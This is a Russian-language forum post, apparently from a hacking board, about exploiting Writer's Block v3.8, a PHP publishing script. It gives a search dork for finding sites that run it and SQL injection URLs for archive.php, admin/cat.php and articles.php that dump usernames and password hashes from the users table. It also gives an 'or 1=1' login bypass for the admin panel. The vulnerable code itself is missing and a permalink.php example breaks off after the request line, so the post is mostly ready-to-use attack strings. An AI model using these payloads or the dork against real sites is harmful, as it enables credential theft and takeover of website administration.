![]() |
Уязвимости Writer's Block v3.8
Уязвимости Writer's Block v3.8
download: http://www.desiquintans.com/writers-block/downloads/writersblock-current.zip dork: "Published by Writer’s Block" SQL-injection 1) archive.php (требования: magic_quotes=off) уязвимый код: PHP код:
Код:
archive.php?cat=-1'/**/union/**/select/**/1,concat_ws(0x3a,UserName,Password),3/**/from/**/wb_users/*2) /admin/cat.php (требования: доступ в админ панель) уязвимый код: PHP код:
в этой инъекции мк=офф уже не обязательно, но в админку еще попасть надо =)... Код:
admin/cat.php?action=edit&PCatID=1+union+select+1,2,3,version(),5--Bypass (требования: magic_quotes=off) уязвимый код: /admin/login.php PHP код:
идем в /admin/login.php и вбиваем: Username:'/**/or/**/1=1/* Password:<any symbols without space> |
Version: 3.8
SQL Injection Vuln file: articles.php PHP код:
Код:
http://[host]/[path]/articles.php?page=1'+union+select+null,concat_ws(0x3a,UserName,Password),null,null,null,null,null,null,null,null+from+wb_users+where+UserID=1+--+PHP код:
Код:
POST http://[host]/[path]/permalink.php HTTP/1.0Для успешной эксплуатации уязвимостей необходимо: magic_quotes = OFF |
| Время: 12:41 |